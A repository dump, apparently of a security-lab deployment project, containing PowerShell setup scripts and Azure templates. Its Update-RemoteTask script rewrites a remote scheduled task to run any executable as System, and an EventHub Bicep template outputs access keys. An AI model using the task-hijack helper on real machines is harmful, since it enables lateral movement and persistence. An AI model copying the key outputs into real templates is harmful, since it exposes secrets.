16 | Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings' -name ProxyEnable -Value 1
17 | }
18 | else {
19 | Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings' -name ProxyServer -Value ""
20 | Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings' -name ProxyEnable -Value 0
21 | }
--------------------------------------------------------------------------------
/resources/scripts/powershell/misc/Set-StaticIP.ps1:
--------------------------------------------------------------------------------
1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
2 | # License: GPL-3.0
3 |
4 | # References:
5 | # https://aws.amazon.com/blogs/compute/optimizing-joining-windows-server-instances-to-a-domain-with-powershell-in-aws-cloudformation/
6 |
7 | [CmdletBinding()]
8 | param (
9 | [Parameter(Mandatory=$false)]
10 | [string]$ServerAddresses
11 | )
12 |
13 | $ErrorActionPreference = "Stop"
14 |
15 | $netip = Get-NetIPConfiguration
16 | $ipconfig = Get-NetIPAddress | ?{$_.IpAddress -eq $netip.IPv4Address.IpAddress}
17 | Get-NetAdapter | Set-NetIPInterface -DHCP Disabled
18 | Get-NetAdapter | New-NetIPAddress -AddressFamily IPv4 -IPAddress $netip.IPv4Address.IpAddress -PrefixLength $ipconfig.PrefixLength -DefaultGateway $netip.IPv4DefaultGateway.NextHop
19 | if($ServerAddresses)
20 | {
21 | Get-NetAdapter | Set-DnsClientServerAddress -ServerAddresses $ServerAddresses
22 |
23 | }
24 | else{
25 | Get-NetAdapter | Set-DnsClientServerAddress -ServerAddresses $netip.DNSServer.ServerAddresses
26 | }
--------------------------------------------------------------------------------
/resources/scripts/powershell/misc/Set-WallPaper.ps1:
--------------------------------------------------------------------------------
1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
2 | # License: GPL-3.0
3 |
4 | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
5 |
6 | Resolve-DnsName github.com
7 | Resolve-DnsName raw.githubusercontent.com
8 | Resolve-DnsName live.sysinternals.com
9 |
10 | $wc = new-object System.Net.WebClient
11 | # Download BgInfo
12 | $wc.DownloadFile('http://live.sysinternals.com/bginfo.exe', 'C:\ProgramData\bginfo.exe')
13 |
14 | # Copy Wallpaper
15 | $wc.DownloadFile('https://raw.githubusercontent.com/OTRF/Blacksmith/master/resources/configs/bginfo/otr.jpg', 'C:\ProgramData\otr.jpg')
16 |
17 | # Copy BGInfo config
18 | $wc.DownloadFile('https://raw.githubusercontent.com/OTRF/Blacksmith/master/resources/configs/bginfo/OTRWallPaper.bgi', 'C:\ProgramData\OTRWallPaper.bgi')
19 |
20 | # Set Run Key
21 | New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "BgInfo" -Value "C:\ProgramData\bginfo.exe C:\ProgramData\OTRWallPaper.bgi /silent /timer:0 /nolicprompt" -PropertyType "String" -force
--------------------------------------------------------------------------------
/resources/scripts/powershell/misc/Update-LocalAdminPWD.ps1:
--------------------------------------------------------------------------------
1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
2 | # License: GPL-3.0
3 |
4 | # References:
5 |
6 | [CmdletBinding()]
7 | param (
8 | [Parameter(Mandatory=$true)]
9 | [String]$LocalAdminPassword
10 | )
11 |
12 | Write-Host "Updating Local Administrator Password.."
13 | ([adsi]"WinNT://$env:computername/Administrator").SetPassword("$LocalAdminPassword")
--------------------------------------------------------------------------------
/resources/scripts/powershell/misc/Update-RemoteTask.ps1:
--------------------------------------------------------------------------------
1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
2 | # License: GPL-3.0
3 |
4 | # References:
5 | function Update-RemoteTask {
6 |
7 | [CmdletBinding()]
8 | param (
9 | [Parameter(Mandatory=$true)]
10 | [string]$ComputerName,
11 |
12 | [Parameter(Mandatory=$false)]
13 | [string]$FolderName,
14 |
15 | [Parameter(Mandatory=$false)]
16 | [string]$TaskName,
17 |
18 | [Parameter(Mandatory=$false)]
19 | [string]$Executable,
20 |
21 | [Parameter(Mandatory=$false)]
22 | [string]$Arguments
23 | )
24 |
25 | # connect to Task Scheduler:
26 | $service = New-Object -ComObject Schedule.Service
27 | $service.Connect($ComputerName)
28 |
29 | # Get task folder that contains tasks:
30 | $folder = $service.GetFolder($FolderName)
31 |
32 | # Enumerate Specific Task
33 | $task = $folder.GetTask($TaskName)
34 |
35 | # get task definition and change it (i.e Arguments)
36 | $taskdefinition = $task.Definition
37 | $taskdefinition.Actions | ForEach-Object {$_.Path = $Executable}
38 | $taskdefinition.Actions | ForEach-Object {$_.Arguments = $Arguments}
39 |
40 | # Flags:
41 | # 4 = UPDATE
42 | # 6 = CREATE_UPDATE
43 | #
44 | # LogonType:
45 | # 5 = Indicates that a Local System, Local Service, or Network Service account is being used as a security context to run the task.
46 | $folder.RegisterTaskDefinition($task.Name, $taskdefinition, 4, "System", $null, 5)
47 | }
--------------------------------------------------------------------------------
/templates/azure/Authorization-Role-Assignments/resourceScope.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "scopeResourceIDs": {
6 | "type": "array",
7 | "metadata": {
8 | "description": "List of resource IDs to use in the scope"
9 | }
10 | },
11 | "roleDefinitionId": {
12 | "type": "string",
13 | "metadata": {
14 | "description": "Id of the role definition"
15 | }
16 | },
17 | "principalType": {
18 | "type": "string",
19 | "defaultValue": "ServicePrincipal",
20 | "metadata": {
21 | "description": "The principal type of the assigned principal ID."
22 | },
23 | "allowedValues": [
24 | "Device",
25 | "ForeignGroup",
26 | "Group",
27 | "ServicePrincipal",
28 | "User"
29 | ]
30 | },
31 | "principalId": {
32 | "type": "string",
33 | "metadata": {
34 | "description": "The ID of the user, group, or application (service principal object ID) you want to assign the role to"
35 | }
36 | }
37 | },
38 | "variables": {},
39 | "resources": [
40 | {
41 | "type": "Microsoft.Authorization/roleAssignments",
42 | "apiVersion": "2020-10-01-preview",
43 | "name": "[guid(parameters('scopeResourceIDs')[copyIndex('rolesAssignmentCopy')])]",
44 | "scope": "[parameters('scopeResourceIDs')[copyIndex('rolesAssignmentCopy')]]",
45 | "copy": {
46 | "name": "rolesAssignmentCopy",
47 | "count": "[length(parameters('scopeResourceIDs'))]"
48 | },
49 | "properties": {
50 | "roleDefinitionId": "[parameters('roleDefinitionId')]",
51 | "principalId": "[parameters('principalId')]",
52 | "principalType": "[parameters('principalType')]"
53 | }
54 | }
55 | ],
56 | "outputs": {}
57 | }
--------------------------------------------------------------------------------
/templates/azure/Azure-Automation-Account/AzureAutomationTutorialNew.ps1:
--------------------------------------------------------------------------------
1 | <#
2 | .DESCRIPTION
3 | An example runbook which gets all the ARM resources using the Managed Identity
4 |
5 | .NOTES
6 | AUTHOR: Azure Automation Team
7 | LASTEDIT: Oct 26, 2021
8 | #>
9 |
10 | "Please enable appropriate RBAC permissions to the system identity of this automation account. Otherwise, the runbook may fail..."
11 |
12 | try
13 | {
14 | "Logging in to Azure..."
15 | Connect-AzAccount -Identity
16 | }
17 | catch {
18 | Write-Error -Message $_.Exception
19 | throw $_.Exception
20 | }
21 |
22 | #Get all ARM resources from all resource groups
23 | $ResourceGroups = Get-AzResourceGroup
24 |
25 | foreach ($ResourceGroup in $ResourceGroups)
26 | {
27 | Write-Output ("Showing resources in resource group " + $ResourceGroup.ResourceGroupName)
28 | $Resources = Get-AzResource -ResourceGroupName $ResourceGroup.ResourceGroupName
29 | foreach ($Resource in $Resources)
30 | {
31 | Write-Output ($Resource.Name + " of type " + $Resource.ResourceType)
32 | }
33 | Write-Output ("")
34 | }
--------------------------------------------------------------------------------
/templates/azure/Azure-Automation-Account/azuredeploy.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
3 | "contentVersion": "2.0.0.0",
4 | "parameters": {
5 | "accountName": {
6 | "type": "String",
7 | "metadata": {
8 | "description": "Name of the automation account"
9 | }
10 | },
11 | "location": {
12 | "defaultValue": "[resourceGroup().location]",
13 | "type": "String",
14 | "metadata": {
15 | "description": "Location for automation account"
16 | }
17 | }
18 | },
19 | "variables": {
20 | "artifactsBlacksmith": "https://raw.githubusercontent.com/OTRF/Blacksmith/master/"
21 | },
22 | "resources": [
23 | {
24 | "type": "Microsoft.Automation/automationAccounts",
25 | "apiVersion": "2021-06-22",
26 | "name": "[parameters('accountName')]",
27 | "location": "[parameters('location')]",
28 | "dependsOn": [],
29 | "tags": {},
30 | "identity": {
31 | "type": "SystemAssigned"
32 | },
33 | "properties": {
34 | "sku": {
35 | "name": "Basic"
36 | },
37 | "publicNetworkAccess": true
38 | },
39 | "resources": [
40 | {
41 | "type": "runbooks",
42 | "apiVersion": "2019-06-01",
43 | "name": "AzureAutomationTutorialWithIdentity",
44 | "location": "[parameters('location')]",
45 | "dependsOn": [
46 | "[concat('Microsoft.Automation/automationAccounts/', parameters('accountName'))]"
47 | ],
48 | "tags": {},
49 | "properties": {
50 | "runbookType": "PowerShell",
51 | "logProgress": false,
52 | "logVerbose": false,
53 | "description": "An example runbook which gets all the ARM resources using the Managed Identity.",
54 | "publishContentLink": {
55 | "uri": "[uri(variables('artifactsBlacksmith'), 'templates/azure/Azure-Automation-Account/AzureAutomationTutorialNew.ps1')]",
56 | "version": "1.0.0.0"
57 | }
58 | }
59 | }
60 | ]
61 | }
62 | ]
63 | }
--------------------------------------------------------------------------------
/templates/azure/Azure-Bastion-Host/README.md:
--------------------------------------------------------------------------------
1 | # Azure Bastion Host
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FAzure-Bastion-Host%2Fazuredeploy.json)
4 |
5 | [](https://portal.azure.us/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FAzure-Bastion-Host%2Fazuredeploy.json)
6 |
7 | ## References
8 | * https://docs.microsoft.com/en-us/azure/bastion/bastion-overview
9 | * https://azure.microsoft.com/en-us/pricing/details/azure-bastion/
--------------------------------------------------------------------------------
/templates/azure/Azure-CosmosDB-Graph/README.md:
--------------------------------------------------------------------------------
1 | # CosmosDB Graph
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FCosmosDB-Graph%2Fazuredeploy.json)
--------------------------------------------------------------------------------
/templates/azure/Azure-EventHub/README.md:
--------------------------------------------------------------------------------
1 | # Linux Virtual Machine
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FEventHub%2Fazuredeploy.json) [](http://armviz.io/#/?load=https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FEventHub%2Fazuredeploy.json)
--------------------------------------------------------------------------------
/templates/azure/Azure-EventHub/azuredeploy.parameters.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentParameters.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "projectName": {
6 | "value": "MordorData"
7 | },
8 | "eventHubSku": {
9 | "value": "Standard"
10 | }
11 | }
12 | }
--------------------------------------------------------------------------------
/templates/azure/Azure-EventHub/main.bicep:
--------------------------------------------------------------------------------
1 | param utcValue string {
2 | metadata: {
3 | description: 'Returns the current (UTC) datetime value in the specified format. If no format is provided, the ISO 8601 (yyyyMMddTHHmmssZ) format is used'
4 | }
5 | default: utcNow()
6 | }
7 | param projectName string {
8 | metadata: {
9 | description: 'Specifies a project name that is used to generate the Event Hub name and the Namespace name.'
10 | }
11 | }
12 | param location string {
13 | metadata: {
14 | description: 'Specifies the Azure location for all resources.'
15 | }
16 | default: resourceGroup().location
17 | }
18 | param eventHubSku string {
19 | allowed: [
20 | 'Basic'
21 | 'Standard'
22 | ]
23 | metadata: {
24 | description: 'Specifies the messaging tier for service Bus namespace.'
25 | }
26 | default: 'Standard'
27 | }
28 |
29 | var uniqueNamespace = concat(projectName, uniqueString(resourceGroup().id, utcValue))
30 | var eventHubName_var = 'evh-${projectName}'
31 | var eventHubNamespaceName_var = 'evhns-${uniqueNamespace}'
32 | var defaultSASKeyName = 'RootManageSharedAccessKey'
33 | var authRuleResourceId = resourceId('Microsoft.EventHub/namespaces/authorizationRules', eventHubNamespaceName_var, defaultSASKeyName)
34 |
35 | resource eventHubNamespaceName 'Microsoft.EventHub/namespaces@2017-04-01' = {
36 | name: eventHubNamespaceName_var
37 | location: location
38 | sku: {
39 | name: eventHubSku
40 | tier: eventHubSku
41 | capacity: 1
42 | }
43 | properties: {
44 | isAutoInflateEnabled: false
45 | maximumThroughputUnits: 0
46 | }
47 | }
48 |
49 | resource eventHubNamespaceName_eventHubName 'Microsoft.EventHub/namespaces/eventhubs@2017-04-01' = {
50 | name: '${eventHubNamespaceName.name}/${eventHubName_var}'
51 | properties: {
52 | messageRetentionInDays: 7
53 | partitionCount: 1
54 | }
55 | }
56 |
57 | output EventHubName string = eventHubName_var
58 | output EventHubNamespace string = eventHubNamespaceName_var
59 | output NamespaceConnectionString string = listkeys(authRuleResourceId, '2017-04-01').primaryConnectionString
60 | output SharedAccessPolicyPrimaryKey string = listkeys(authRuleResourceId, '2017-04-01').primaryKey
--------------------------------------------------------------------------------
/templates/azure/Azure-FunctionApp-Win-Pwsh/README.md:
--------------------------------------------------------------------------------
1 | # Azure Function Application - PowerShell
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FAzure-FunctionApp-Win-Pwsh%2Fazuredeploy.json) [](http://armviz.io/#/?load=https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FAzure-FunctionApp-Win-Pwsh%2Fazuredeploy.json)
4 |
5 | [](https://portal.azure.us/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FAzure-FunctionApp-Win-Pwsh%2Fazuredeploy.json)
--------------------------------------------------------------------------------
/templates/azure/Azure-FunctionApp-Win-Pwsh/funcApp.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/templates/azure/Azure-FunctionApp-Win-Pwsh/funcApp.zip
--------------------------------------------------------------------------------
/templates/azure/Azure-FunctionApp-Win-Pwsh/funcApp/.funcignore:
--------------------------------------------------------------------------------
1 | .git*
2 | .vscode
3 | local.settings.json
4 | test
--------------------------------------------------------------------------------
/templates/azure/Azure-FunctionApp-Win-Pwsh/funcApp/.gitignore:
--------------------------------------------------------------------------------
1 |
2 | # Azure Functions artifacts
3 | bin
4 | obj
5 | appsettings.json
6 | local.settings.json
7 |
8 | # Azurite artifacts
9 | __blobstorage__
10 | __queuestorage__
11 | __azurite_db*__.json
--------------------------------------------------------------------------------
/templates/azure/Azure-FunctionApp-Win-Pwsh/funcApp/.vscode/extensions.json:
--------------------------------------------------------------------------------
1 | {
2 | "recommendations": [
3 | "ms-azuretools.vscode-azurefunctions",
4 | "ms-vscode.PowerShell"
5 | ]
6 | }
--------------------------------------------------------------------------------
/templates/azure/Azure-FunctionApp-Win-Pwsh/funcApp/.vscode/launch.json:
--------------------------------------------------------------------------------
1 | {
2 | "version": "0.2.0",
3 | "configurations": [
4 | {
5 | "name": "Attach to PowerShell Functions",
6 | "type": "PowerShell",
7 | "request": "attach",
8 | "customPipeName": "AzureFunctionsPSWorker",
9 | "runspaceId": 1,
10 | "preLaunchTask": "func: host start"
11 | }
12 | ]
13 | }
--------------------------------------------------------------------------------
/templates/azure/Azure-FunctionApp-Win-Pwsh/funcApp/.vscode/settings.json:
--------------------------------------------------------------------------------
1 | {
2 | "azureFunctions.deploySubpath": ".",
3 | "azureFunctions.projectLanguage": "PowerShell",
4 | "azureFunctions.projectRuntime": "~3",
5 | "debug.internalConsoleOptions": "neverOpen"
6 | }
--------------------------------------------------------------------------------
/templates/azure/Azure-FunctionApp-Win-Pwsh/funcApp/.vscode/tasks.json:
--------------------------------------------------------------------------------
1 | {
2 | "version": "2.0.0",
3 | "tasks": [
4 | {
5 | "type": "func",
6 | "label": "func: host start",
7 | "command": "host start",
8 | "problemMatcher": "$func-powershell-watch",
9 | "isBackground": true
10 | }
11 | ]
12 | }
--------------------------------------------------------------------------------
/templates/azure/Azure-FunctionApp-Win-Pwsh/funcApp/Hello/function.json:
--------------------------------------------------------------------------------
1 | {
2 | "bindings": [
3 | {
4 | "authLevel": "function",
5 | "type": "httpTrigger",
6 | "direction": "in",
7 | "name": "Request",
8 | "methods": [
9 | "get",
10 | "post"
11 | ]
12 | },
13 | {
14 | "type": "http",
15 | "direction": "out",
16 | "name": "Response"
17 | }
18 | ]
19 | }
--------------------------------------------------------------------------------
/templates/azure/Azure-FunctionApp-Win-Pwsh/funcApp/Hello/run.ps1:
--------------------------------------------------------------------------------
1 | using namespace System.Net
2 |
3 | # Input bindings are passed in via param block.
4 | param($Request, $TriggerMetadata)
5 |
6 | # Write to the Azure Functions log stream.
7 | Write-Host "PowerShell HTTP trigger function processed a request."
8 |
9 | # Interact with query parameters or the body of the request.
10 | $name = $Request.Query.Name
11 | if (-not $name) {
12 | $name = $Request.Body.Name
13 | }
14 |
15 | $body = "This HTTP triggered function executed successfully. Pass a name in the query string or in the request body for a personalized response."
16 |
17 | if ($name) {
18 | $body = "Hello, $name. This HTTP triggered function executed successfully."
19 | }
20 |
21 | # Associate values to output bindings by calling 'Push-OutputBinding'.
22 | Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{
23 | StatusCode = [HttpStatusCode]::OK
24 | Body = $body
25 | })
26 |
--------------------------------------------------------------------------------
/templates/azure/Azure-FunctionApp-Win-Pwsh/funcApp/Hello/sample.dat:
--------------------------------------------------------------------------------
1 | {
2 | "name": "Azure"
3 | }
4 |
--------------------------------------------------------------------------------
/templates/azure/Azure-FunctionApp-Win-Pwsh/funcApp/host.json:
--------------------------------------------------------------------------------
1 | {
2 | "version": "2.0",
3 | "logging": {
4 | "applicationInsights": {
5 | "samplingSettings": {
6 | "isEnabled": true,
7 | "excludedTypes": "Request"
8 | }
9 | }
10 | },
11 | "extensionBundle": {
12 | "id": "Microsoft.Azure.Functions.ExtensionBundle",
13 | "version": "[3.*, 4.0.0)"
14 | },
15 | "managedDependency": {
16 | "enabled": true
17 | }
18 | }
--------------------------------------------------------------------------------
/templates/azure/Azure-FunctionApp-Win-Pwsh/funcApp/profile.ps1:
--------------------------------------------------------------------------------
1 | # Azure Functions profile.ps1
2 | #
3 | # This profile.ps1 will get executed every "cold start" of your Function App.
4 | # "cold start" occurs when:
5 | #
6 | # * A Function App starts up for the very first time
7 | # * A Function App starts up after being de-allocated due to inactivity
8 | #
9 | # You can define helper functions, run commands, or specify environment variables
10 | # NOTE: any variables defined that are not environment variables will get reset after the first execution
11 |
12 | # Authenticate with Azure PowerShell using MSI.
13 | # Remove this if you are not planning on using MSI or Azure PowerShell.
14 | if ($env:MSI_SECRET) {
15 | Disable-AzContextAutosave -Scope Process | Out-Null
16 | Connect-AzAccount -Identity
17 | }
18 |
19 | # Uncomment the next line to enable legacy AzureRm alias in Azure PowerShell.
20 | # Enable-AzureRmAlias
21 |
22 | # You can also define functions or aliases that can be referenced in any of your PowerShell functions.
23 |
--------------------------------------------------------------------------------
/templates/azure/Azure-FunctionApp-Win-Pwsh/funcApp/requirements.psd1:
--------------------------------------------------------------------------------
1 | # This file enables modules to be automatically managed by the Functions service.
2 | # See https://aka.ms/functionsmanageddependency for additional information.
3 | #
4 | @{
5 | # For latest supported version, go to 'https://www.powershellgallery.com/packages/Az'.
6 | # To use the Az module in your function app, please uncomment the line below.
7 | # 'Az' = '9.*'
8 | }
--------------------------------------------------------------------------------
/templates/azure/Azure-Key-Vault/README.md:
--------------------------------------------------------------------------------
1 | # Azure Key Vault + Access Policy
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FAzure-Key-Vault%2Fazuredeploy.json) [](http://armviz.io/#/?load=https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FAzure-Key-Vault%2Fazuredeploy.json)
4 |
5 | [](https://portal.azure.us/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FAzure-Key-Vault%2Fazuredeploy.json)
6 |
7 | ## References
8 |
9 | * https://docs.microsoft.com/en-us/azure/key-vault/general/vault-create-template?tabs=CLI
10 | * https://docs.microsoft.com/en-us/azure/templates/microsoft.keyvault/vaults?tabs=json
11 | * https://github.com/Azure/azure-quickstart-templates/tree/master/modules/Microsoft.KeyVault/vaults/1.0
12 | * https://github.com/Azure/azure-quickstart-templates/tree/master/quickstarts/microsoft.keyvault/key-vault-create
13 | * https://github.com/Azure/azure-quickstart-templates/tree/master/quickstarts/microsoft.keyvault/key-vault-create-rbac
14 | * https://github.com/Azure/azure-quickstart-templates/tree/master/quickstarts/microsoft.keyvault/key-vault-secret-create
15 | * https://github.com/Azure/azure-quickstart-templates/tree/master/quickstarts/microsoft.keyvault/key-vault-with-logging-create
--------------------------------------------------------------------------------
/templates/azure/Azure-Monitor-Agents/README.md:
--------------------------------------------------------------------------------
1 | # Azure Monitor Agents
--------------------------------------------------------------------------------
/templates/azure/Azure-Monitor-Data-Collection-Endpoint/README.md:
--------------------------------------------------------------------------------
1 | # Data Collection Endpoint
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FData-Collection-Endpoint%2Fazuredeploy.json) [](http://armviz.io/#/?load=https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FData-Collection-Endpoint%2Fazuredeploy.json)
4 |
5 | Data Collection Endpoints (DCEs) allow you to uniquely configure ingestion settings for Azure Monitor.
6 |
7 | ## References:
8 | * https://docs.microsoft.com/en-us/azure/azure-monitor/essentials/data-collection-endpoint-overview
9 | * https://docs.microsoft.com/en-us/azure/templates/microsoft.insights/datacollectionendpoints?tabs=json
10 | * https://docs.microsoft.com/en-us/azure/templates/microsoft.insights/2021-04-01/datacollectionendpoints?tabs=json
--------------------------------------------------------------------------------
/templates/azure/Azure-Monitor-Data-Collection-Rules/azuredeploy.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "ruleName": {
6 | "type": "String",
7 | "metadata": {
8 | "description": "Specifies the name of the data collection rule to create."
9 | }
10 | },
11 | "location": {
12 | "type": "string",
13 | "metadata": {
14 | "description": "Specifies the location in which to create the data collection rule."
15 | },
16 | "defaultValue": "[resourceGroup().location]"
17 | },
18 | "dataSources": {
19 | "type": "Object",
20 | "metadata": {
21 | "description": "The specification of data sources."
22 | }
23 | },
24 | "dataFlows": {
25 | "type": "Array",
26 | "metadata": {
27 | "description": "The specification of data flows."
28 | }
29 | },
30 | "destinations": {
31 | "type": "Object",
32 | "metadata": {
33 | "description": "The specification of destinations."
34 | }
35 | },
36 | "tagsArray": {
37 | "type": "Object",
38 | "defaultValue": {}
39 | }
40 | },
41 | "resources": [
42 | {
43 | "type": "microsoft.insights/dataCollectionRules",
44 | "apiVersion": "2021-04-01",
45 | "name": "[parameters('ruleName')]",
46 | "location": "[parameters('location')]",
47 | "tags": "[parameters('tagsArray')]",
48 | "properties": {
49 | "dataSources": "[parameters('dataSources')]",
50 | "destinations": "[parameters('destinations')]",
51 | "dataFlows": "[parameters('dataFlows')]"
52 | }
53 | }
54 | ],
55 | "outputs": {
56 | "dataCollectionRuleId": {
57 | "type": "String",
58 | "value": "[resourceId('microsoft.insights/dataCollectionRules', parameters('ruleName'))]"
59 | }
60 | }
61 | }
--------------------------------------------------------------------------------
/templates/azure/Azure-Monitor-Dependency-Agents/azuredeploy.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "virtualMachines": {
6 | "type": "array",
7 | "metadata": {
8 | "description": "List of endpoints to install the Azure Monitor Dependency Agent. The format is an array of endpoints with a property/attribute named 'vmName'"
9 | }
10 | },
11 | "location": {
12 | "type": "string",
13 | "defaultValue": "[resourceGroup().location]",
14 | "metadata": {
15 | "description": "Location for all resources."
16 | }
17 | }
18 | },
19 | "variables": {
20 | "DaExtensionVersion": "9.5"
21 | },
22 | "resources": [
23 | {
24 | "name": "[concat(parameters('virtualMachines')[copyIndex('AMDACopy')].vmName,'/', if(equals(parameters('virtualMachines')[copyIndex('AMDACopy')].os, 'windows'), 'DependencyAgentWindows', 'DependencyAgentLinux'))]",
25 | "type": "Microsoft.Compute/virtualMachines/extensions",
26 | "apiVersion": "2020-06-01",
27 | "location": "[parameters('location')]",
28 | "copy": {
29 | "name": "AMDACopy",
30 | "count": "[length(parameters('virtualMachines'))]"
31 | },
32 | "properties": {
33 | "publisher": "Microsoft.Azure.Monitoring.DependencyAgent",
34 | "type": "[if(equals(parameters('virtualMachines')[copyIndex('AMDACopy')].os, 'windows'), 'DependencyAgentWindows', 'DependencyAgentLinux')]",
35 | "typeHandlerVersion": "[variables('DaExtensionVersion')]",
36 | "autoUpgradeMinorVersion": true
37 | }
38 | }
39 | ],
40 | "outputs": {}
41 | }
--------------------------------------------------------------------------------
/templates/azure/Azure-Resources-Deployment-Scripts/azuredeploy.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "deploymentScriptName": {
6 | "type": "string",
7 | "metadata": {
8 | "description": "Name of deployment script resource"
9 | }
10 | },
11 | "identityId": {
12 | "type": "string",
13 | "metadata": {
14 | "description": "Id of the managed identity to create Azure AD applications used by cloud katana to expose its API and enable Azure AD authentication and authorization. Format: /subscriptions/SUBSCRIPTIONID/resourcegroups/GROUP/providers/Microsoft.ManagedIdentity/userAssignedIdentities/IDENTITYNAME"
15 | }
16 | },
17 | "utcValue": {
18 | "type": "string",
19 | "defaultValue": "[utcNow()]"
20 | },
21 | "scriptContent": {
22 | "type": "string",
23 | "metadata": {
24 | "description": "Script Content"
25 | }
26 | },
27 | "supportingScriptUris": {
28 | "type": "array",
29 | "metadata": {
30 | "description": "Supporting files for the external script."
31 | }
32 | },
33 | "location": {
34 | "type": "string",
35 | "defaultValue": "[resourceGroup().location]",
36 | "metadata": {
37 | "description": "Specifies the Azure location for all resources."
38 | }
39 | }
40 | },
41 | "resources": [
42 | {
43 | "type": "Microsoft.Resources/deploymentScripts",
44 | "apiVersion": "2020-10-01",
45 | "name": "[parameters('deploymentScriptName')]",
46 | "location": "[parameters('location')]",
47 | "identity": {
48 | "type": "UserAssigned",
49 | "userAssignedIdentities": {
50 | "[parameters('identityId')]": {}
51 | }
52 | },
53 | "kind": "AzurePowerShell",
54 | "properties": {
55 | "forceUpdateTag": "[parameters('utcValue')]",
56 | "azPowerShellVersion": "6.2",
57 | "timeout": "PT30M",
58 | "scriptContent": "[parameters('scriptContent')]",
59 | "supportingScriptUris": "[parameters('supportingScriptUris')]",
60 | "cleanupPreference": "OnSuccess",
61 | "retentionInterval": "PT1H"
62 | }
63 | }
64 | ],
65 | "outputs": {}
66 | }
--------------------------------------------------------------------------------
/templates/azure/Azure-Static-WebApp/auredeploy.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "siteName": {
6 | "defaultValue": "Scurry",
7 | "type": "String"
8 | },
9 | "repositoryUrl": {
10 | "type": "string"
11 | },
12 | "branch": {
13 | "type": "string",
14 | "defaultValue": "main",
15 | "metadata": {
16 | "description": "The target branch in the repository."
17 | }
18 | },
19 | "location": {
20 | "type": "string",
21 | "defaultValue": "[resourceGroup().location]",
22 | "metadata": {
23 | "description": "Location for all resources."
24 | }
25 | }
26 | },
27 | "variables": {},
28 | "resources": [
29 | {
30 | "type": "Microsoft.Web/staticSites",
31 | "apiVersion": "2022-03-01",
32 | "name": "[parameters('siteName')]",
33 | "location": "[parameters('location')]",
34 | "sku": {
35 | "name": "Standard",
36 | "tier": "Standard"
37 | },
38 | "properties": {
39 | "repositoryUrl": "[parameters('repositoryUrl')]",
40 | "branch": "[parameters('branch')]",
41 | "stagingEnvironmentPolicy": "Enabled",
42 | "allowConfigFileUpdates": true,
43 | "provider": "DevOps",
44 | "enterpriseGradeCdnStatus": "Disabled"
45 | }
46 | }
47 | ]
48 | }
--------------------------------------------------------------------------------
